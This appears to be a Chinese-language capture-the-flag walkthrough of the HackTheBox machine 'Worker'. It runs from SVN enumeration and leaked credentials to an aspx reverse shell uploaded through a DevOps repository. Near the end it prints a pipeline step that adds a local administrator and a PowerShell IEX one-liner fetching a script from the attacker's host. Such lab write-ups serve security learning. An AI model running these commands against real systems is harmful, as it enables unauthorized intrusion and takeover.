HackTheBox-Worker

靶机实验HackTheBox
, ,

靶机名:Worker
难度:中等?

0x01 信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
nmap -p 80,3690,5985 -sV --script=vuln worker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-17 08:21 UTC
Nmap scan report for worker.htb (10.129.50.115)
Host is up (0.23s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3690/tcp open  svnserve Subversion
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1056.00 seconds

svn

安装svn

1
sudo apt install subversion

将服务器的文件夹克隆到本地(直接就成功了,存在未授权漏洞)

1
svn checkout svn://10.129.2.29

image-20201224225525089

获得一个文件夹,和一个txt文件。

image-20201224225658388

版本是5

1
Checked out revision 5.

image-20201224225629760

知道了目标的兩个子域名,并且得知库已经迁移之乐devops.worker.htb了

  • dimension.worker.htb
  • devops.worker.htb

查询

image-20201224225932047

1
svn merge -r 5:3 svn://worker.htb

image-20210114175550213

再回滚前面一点看看

1
svn merge -r 5:2 svn:worker.htb

image-20210115195859801

用获得的账号密码访问devops

image-20210115201714503

点进去项目后,有个源代码库。结合前面svn下的两个txt文件。猜测这个是新的项目库,加入到hosts看看

1
spectral.worker.htb

image-20210117121013223

image-20210117121305172

image-20210117121430531

点击上传文件,上传一个aspx的反向shell.

image-20210117121505855

要新建一个分支,再合并(因为没有权限直接上传到主分支..)。

image-20210117121605989

image-20210117121619278

手动点击下Approve。然后就可以合并了

image-20210117121703601

收到了反弹的shell..看上去可以烂土豆?不过我测试用下载命令也下载不到东西.

image-20210117011422344

image-20210117011630176

查询svnserve服务配置信息,发现是有另外一个挂载盘的。

image-20210117143619574

在其下面找到许多用户的passwd.

image-20210117125042365

image-20210117125311963

用获得的用户重新登陆下devpos,就会发现里面换了一个项目了。

image-20210117130215782

image-20210117184434674

默认的pool要删掉,否则run的时候会报错.

1
2
3
4
5
6
7
8
steps:
- script: echo This runs in the default shell on any machine
- bash: |
    echo This multiline script always runs in Bash.
    echo Even on Windows machines!
- pwsh: |
    Write-Host "This multiline script always runs in PowerShell Core."
    Write-Host "Even on non-Windows machines!"

通过阅读文档 会发现 script处会执行系统上默认的shell程序,所以可以添加下面两句代码(其中一个)

1
2
3
4
net localgroup administrators robisl /add


powershell -c "Start-Process powershell {IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6:81/shell1.ps1')}"

用powerhsell反弹的方式虽然可以,但是不一会就会被控制台中断掉进程了,,不过时间也够看个root.txt或者给robisl用户加上个adminsitrators了

image-20210117155557487

重新用evil-winrm重新登录一下.

image-20210117133523021

image-20210117135234447